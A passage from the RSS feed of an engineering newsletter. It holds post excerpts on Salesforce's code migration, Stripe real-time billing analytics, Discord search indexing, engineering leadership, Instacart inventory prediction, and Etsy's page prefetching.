package</p></li><li><p>Leaf-to-root migration pipeline based on reference direction</p></li><li><p>Pattern-based transformation rules for Apex-to-Java conversion</p></li><li><p>Service-layer architecture with dependency injection</p></li><li><p>Test suite redesign focused on behavioral validation</p></li><li><p>Multi-phase bug bash process with cross-team participation</p></li><li><p>Infrastructure to maintain 14,000 files (legacy + new) simultaneously</p></li></ul><div><hr></div><h2><strong>&#127937; Bottom Line</strong></h2><p>Salesforce didn&#8217;t migrate Own Archive because the old version was broken. They migrated because enterprise customers demand native platform integration, and compliance teams won&#8217;t approve external packages for core data flows.</p><p>For engineering leaders and architects:</p><p><strong>Map dependencies before migration starts.</strong> You can&#8217;t translate interdependent code in arbitrary order. Graph analysis reveals natural layers and eliminates guesswork.</p><p><strong>Automate mechanical translation, validate architectural decisions.</strong> Pattern-based rules scale to thousands of files. Human review ensures output matches target patterns. Don&#8217;t automate blindly&#8212;automate strategically.</p><p><strong>Redesign tests around new boundaries.</strong> Legacy test suites encode legacy assumptions. Rewrite for behavioral validation, not implementation preservation.</p><p><strong>Accept that scale breaks manual processes.</strong> 10 files? Manual works. 3,537 files? Manual is a 2-year disaster. Volume forces innovation.</p><p><strong>Validation is where correctness lives.</strong> Fast code generation means nothing if it ships broken behavior. Systematic testing, bug bashes, and iterative refinement are non-negotiable.</p><p><strong>Plan for dual-system maintenance.</strong> Migration isn&#8217;t flipping a switch. The team maintained both versions simultaneously, 14,000 files managed by the same engineers. Plan capacity accordingly.</p><p>Legacy migration isn&#8217;t about rewriting old code. It&#8217;s about extracting value from proven systems while aligning with modern architectural constraints. Salesforce built a process where &#8220;modern&#8221; arrived in 4 months, not 2 years.</p><div><hr></div><p class="button-wrapper" data-attrs="{&quot;url&quot;:&quot;https://engineering.salesforce.com/how-ai-driven-refactoring-cut-a-2-year-legacy-code-migration-to-4-months/&quot;,&quot;text&quot;:&quot;Read More!&quot;,&quot;action&quot;:null,&quot;class&quot;:null}" data-component-name="ButtonCreateButton"><a class="button primary" href="https://engineering.salesforce.com/how-ai-driven-refactoring-cut-a-2-year-legacy-code-migration-to-4-months/"><span>Read More!</span></a></p><p></p>]]></content:encoded></item><item><title><![CDATA[How Stripe built real-time billing analytics that actually works]]></title><description><![CDATA[TL;DR Stripe&#8217;s batch-based billing analytics worked fine when updates could wait 24 hours.]]></description><link>https://read.bytesizeddesign.com/p/how-stripe-built-real-time-billing</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-stripe-built-real-time-billing</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 09 Dec 2025 08:01:38 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!UMZA!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F06b64927-5de1-4edc-a245-b9b486e07503_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<h2>TL;DR</h2><p>Stripe&#8217;s batch-based billing analytics worked fine when updates could wait 24 hours. By 2024, customers demanded real-time visibility into MRR, churn, and conversions because in fast-moving markets, yesterday&#8217;s data loses deals today.</p><p>The problem? Subscriptions are stateful nightmares. Every $20 payment needs context from months of history. Batch processing couldn&#8217;t scale to sub-hour latency. Preaggregated queries were fast but couldn&#8217;t incorporate live data. And letting customers change metric definitions meant reprocessing years of history without breaking real-time ingestion.</p><p>The fix? Event-driven streaming with Apache Flink. A brand-new Apache Pinot query engine that aggregates on-the-fly. And a dual-mode system that recalculates history while streaming live updates without the dashboard ever going dark.</p><h2>&#128680; The Breaking Points</h2><h3>Batch Processing Hit a Wall</h3><p>The old system recalculated subscription state by replaying <em>every event from the beginning of time</em>. Want to know if that June payment was on-time? Re-analyze January through June. For every subscription. Every 24 hours.</p><p>This worked until customers started asking: &#8220;Why can&#8217;t I see this trial conversion that just happened?&#8221; Because the batch job won&#8217;t run for another 18 hours, that&#8217;s why.</p><h3>Preaggregation Made Queries Fast But Data Stale</h3><p>Apache Pinot delivered sub-second dashboard queries by precomputing MRR over time in offline batch jobs. Fast responses, but baked-in staleness. Real-time streaming meant throwing out preaggregation&#8212;which meant risk of slow, unresponsive queries that would make the dashboard unusable.</p><h3>Custom Metric Definitions Created a Consistency Nightmare</h3><p>Customers could tweak MRR formulas (exclude coupons, adjust trial periods, etc.). Great for flexibility. Terrible for streaming systems. Change a definition? Now you need to:</p><ol><li><p>Reprocess 8 years of historical data (hours of computation)</p></li><li><p>Keep streaming new events using the <em>old</em> definition (can&#8217;t stop the world)</p></li><li><p>Somehow merge them without showing Frankenstein data in the dashboard</p></li></ol><p>There was no playbook for this.</p><h2>&#128269; Root Causes</h2><h3>1. Stateful Data Modeled with Stateless Batch Jobs</h3><p>Subscriptions have memory. Payments build on each other. But the analytics system pretended each batch was independent&#8212;forcing full history replays to reconstruct state.</p><h3>2. OLAP Optimization Assumed Offline Preparation</h3><p>Pinot&#8217;s speed came from precomputed aggregations. Remove that step for real-time data, and suddenly you&#8217;re doing complex windowed aggregations at query time&#8212;something the original engine couldn&#8217;t handle.</p><h3>3. No Strategy for Incremental Schema Evolution</h3><p>Metric definition changes were treated as &#8220;reindex everything from scratch&#8221; events. No concept of applying changes incrementally while preserving consistency.</p><h2>&#129504; The Solution Architecture</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-stripe-built-real-time-billing">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How Discord indexes Trillions of messages without falling apart]]></title><description><![CDATA[TL;DR Discord&#8217;s 2017 search architecture worked beautifully for billions of messages.]]></description><link>https://read.bytesizeddesign.com/p/how-discord-indexes-trillions-of</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-discord-indexes-trillions-of</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Thu, 04 Dec 2025 06:59:26 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!pS-M!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>TL;DR</strong></p><p>Discord&#8217;s 2017 search architecture worked beautifully for billions of messages. By 2025, under the weight of trillions, it collapsed. Redis queues dropped messages. Single node failures cascaded into 40% of bulk operations failing. 200+ node clusters became unmanageable. Guilds hit Lucene&#8217;s 2 billion message hard limit with no escape.</p><p>The fix? Rethink everything. Smaller clusters grouped into &#8220;cells.&#8221; Smarter message batching by destination. Kubernetes for orchestration. PubSub for guaranteed delivery. And a migration system that could reindex billions of messages without downtime.</p><div><hr></div><h2>&#128680; The Breaking Points</h2><p><strong>Redis Queues Couldn&#8217;t Handle Backpressure</strong></p><p>When Elasticsearch nodes failed (which happened often), the indexing queue backed up. Redis CPU maxed out. Messages got dropped. Search became incomplete.</p><p><strong>Bulk Indexing Was a House of Cards</strong></p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!pS-M!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!pS-M!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 424w, https://substackcdn.com/image/fetch/$s_!pS-M!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 848w, https://substackcdn.com/image/fetch/$s_!pS-M!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 1272w, https://substackcdn.com/image/fetch/$s_!pS-M!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!pS-M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png" width="1456" height="819" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:819,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:790196,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:&quot;https://bytesizeddesign.substack.com/i/180680259?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!pS-M!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 424w, https://substackcdn.com/image/fetch/$s_!pS-M!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 848w, https://substackcdn.com/image/fetch/$s_!pS-M!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 1272w, https://substackcdn.com/image/fetch/$s_!pS-M!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F373b4727-627d-4da8-aafa-f1c25e00427c_1600x900.png 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Workers pulled 50-message batches off the queue. Those messages scattered across 50 different Elasticsearch nodes. One node down? ~40% of bulk operations failed. The entire batch re-queued. Rinse and repeat.</p><p><strong>Large Clusters = High Coordination Tax</strong></p><p>As message volume grew, Discord added nodes. Clusters ballooned to 200+ nodes. But more nodes meant:</p><ul><li><p>Higher coordination overhead</p></li><li><p>More frequent failures (any node can fail at any time)</p></li><li><p>Master nodes OOMing from cluster state management</p></li><li><p>No safe path for rolling restarts or upgrades</p></li></ul><p>The log4shell vulnerability forced them to take search fully offline just to restart nodes with patched configs.</p><p><strong>The Lucene MAX_DOC Ceiling</strong></p><p>Each Elasticsearch index is a Lucene index under the hood. Lucene caps at ~2 billion documents per index. Large guilds hit this limit. All indexing operations failed. The only fix? Delete spam guilds and hope legitimate communities stayed under the limit.</p><div><hr></div><h2>&#128269; Root Causes</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-discord-indexes-trillions-of">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[The Three Things Only Engineering Leaders Can Do (And Why They’re Not Doing Them)]]></title><description><![CDATA[In true Byte-Sized Fashion, no fancy introduction this week, let&#8217;s just jump straight into it!]]></description><link>https://read.bytesizeddesign.com/p/the-three-things-only-engineering</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/the-three-things-only-engineering</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Tue, 25 Nov 2025 06:00:57 GMT</pubDate><enclosure url="https://substack-post-media.s3.amazonaws.com/public/images/ee0f3b34-8608-43f8-93d1-32d213faa2e5_1024x1024.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>In true Byte-Sized Fashion, no fancy introduction this week, let&#8217;s just jump straight into it!</p><h3>1. They Abdicate Technical Vision to &#8220;Emerge Organically&#8221;</h3><p>You hired smart people. You trust them to make g&#8230;</p>
      <p>
          <a href="https://read.bytesizeddesign.com/p/the-three-things-only-engineering">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How Instacart Scales Real-Time Inventory Predictions Across 80,000 Stores]]></title><description><![CDATA[Here&#8217;s a dirty secret of on-demand commerce: nobody knows the real inventory state of a grocery store.]]></description><link>https://read.bytesizeddesign.com/p/how-instacart-scales-real-time-inventory</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-instacart-scales-real-time-inventory</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Sat, 15 Nov 2025 04:13:47 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!dLmH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Here&#8217;s a dirty secret of on-demand commerce: <em>nobody</em> knows the real inventory state of a grocery store. Not the retailer, not the associate, definitely not you.<br>Instacart&#8217;s entire business depends on making that unknowable world feel predictable.</p><p>This edition breaks down the engineering architecture Instacart built to <em>simulate</em> a consistent live inventory model across <strong>hundreds of millions of items</strong>, using a combination of model-driven scoring, lazy refresh pipelines, multi-model experimentation, and a threshold-tuning system that looks more like an F1 control panel than a grocery app.</p><p>This is one of those systems where every layer exists because something simpler exploded.</p><div><hr></div><h1>&#129504; The Core Problem</h1><p>Instacart needs to answer one question&#8212;fast, correctly, and millions of times per minute:</p><blockquote><p><strong>&#8220;If we show this item to a user, how likely is it actually in stock at this specific store&#8230; right now?&#8221;</strong></p></blockquote><p>This prediction drives:</p><ul><li><p>Search ranking</p></li><li><p>Product filtering</p></li><li><p>Shopper routing</p></li><li><p>Customer trust (&#8220;Don&#8217;t show me milk if the store is out of milk again&#8221;)</p></li></ul><p>The output is a <strong>score</strong>, a real-time availability probability that feeds downstream systems.</p><p>The challenge:</p><ul><li><p>Hundreds of millions of items</p></li><li><p>80K+ store locations</p></li><li><p>Score drift happens fast</p></li><li><p>ML model updates happen constantly</p></li><li><p>Retrieval systems need <em>bulk</em> reads with <strong>low latency</strong></p></li><li><p>UI surfaces require <strong>high consistency</strong></p></li></ul><p>You can&#8217;t RPC your way out of this one.</p><div><hr></div><h1>&#9881;&#65039; Real-Time Scoring, but at Scale</h1><p>Instacart receives ML scores from a Real-Time Availability model. But calling the scoring API during search retrieval would have been slower than shopping in real life.</p><p>So they introduced <strong>two ingestion pipelines</strong> to push model outputs <em>into the database</em> ahead of time:</p><h3><strong>1. Full Sync (Snowflake &#8594; DB)</strong></h3><ul><li><p>ML team writes new scores into a Snowflake table multiple times a day</p></li><li><p>Ingestion workers upsert those scores into the serving DB</p></li><li><p>Ensures consistency, especially for long-tail items that rarely get queried</p></li></ul><p>This guarantees freshness, but doing a full sync on hundreds of millions of items is expensive&#8212;both financially and operationally.</p><h3><strong>2. Lazy Refresh (Triggered by Search Results)</strong></h3><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!dLmH!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!dLmH!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp 424w, https://substackcdn.com/image/fetch/$s_!dLmH!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp 848w, https://substackcdn.com/image/fetch/$s_!dLmH!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp 1272w, https://substackcdn.com/image/fetch/$s_!dLmH!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!dLmH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp" width="1100" height="578" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:578,&quot;width&quot;:1100,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:17678,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/webp&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://bytesizeddesign.substack.com/i/178950617?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!dLmH!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp 424w, https://substackcdn.com/image/fetch/$s_!dLmH!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp 848w, https://substackcdn.com/image/fetch/$s_!dLmH!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp 1272w, https://substackcdn.com/image/fetch/$s_!dLmH!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd8007e34-d015-47d7-8a3d-892d6042e4c7_1100x578.webp 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p></p>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-instacart-scales-real-time-inventory">
              Read more
          </a>
      </p>
   ]]></content:encoded></item><item><title><![CDATA[How Etsy Reduced Page Load Time to 0ms]]></title><description><![CDATA[Etsy shipped a performance improvement so dramatic that 40% of their users now see product pages load in essentially zero milliseconds.]]></description><link>https://read.bytesizeddesign.com/p/how-etsy-reduced-page-load-time-to</link><guid isPermaLink="false">https://read.bytesizeddesign.com/p/how-etsy-reduced-page-load-time-to</guid><dc:creator><![CDATA[Byte-Sized Design]]></dc:creator><pubDate>Sun, 09 Nov 2025 04:54:55 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!6-hW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9827bf01-777e-48b3-b2e4-83f0ef534a2b_642x527.webp" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Etsy shipped a performance improvement so dramatic that 40% of their users now see product pages load in essentially zero milliseconds. No infrastructure overhaul. No rewrite. Just a clever use of browser prediction and a 15-line JSON config.</p><p>If you&#8217;re thinking &#8220;prefetching is old news,&#8221; I&#8217;ve got news: you haven&#8217;t seen the Speculation Rules API yet.</p><h2>The 200ms Window</h2><p>The traditional web flow is brutally wasteful. User hovers over a product link. User&#8217;s brain decides this looks interesting. User moves cursor to click. Click event fires. Browser initiates request. DNS lookup. TCP handshake. TLS negotiation. HTTP request. Server processing. Response headers. HTML starts streaming. Parser kicks in. More requests for CSS, JavaScript, images.</p><p>The entire time between hover and click&#8212;typically 200-500ms&#8212;the browser just sits there. Your user has already made their decision. The machine is waiting for permission.</p><p>This is the opportunity Etsy exploited.</p><h2>What Makes Speculation Rules Different</h2>
      <p>
          <a href="https://read.bytesizeddesign.com/p/how-etsy-reduced-page-load-time-to">
              Read more
          </a>
      </p>
   ]]></content:encoded></item></channel></rss>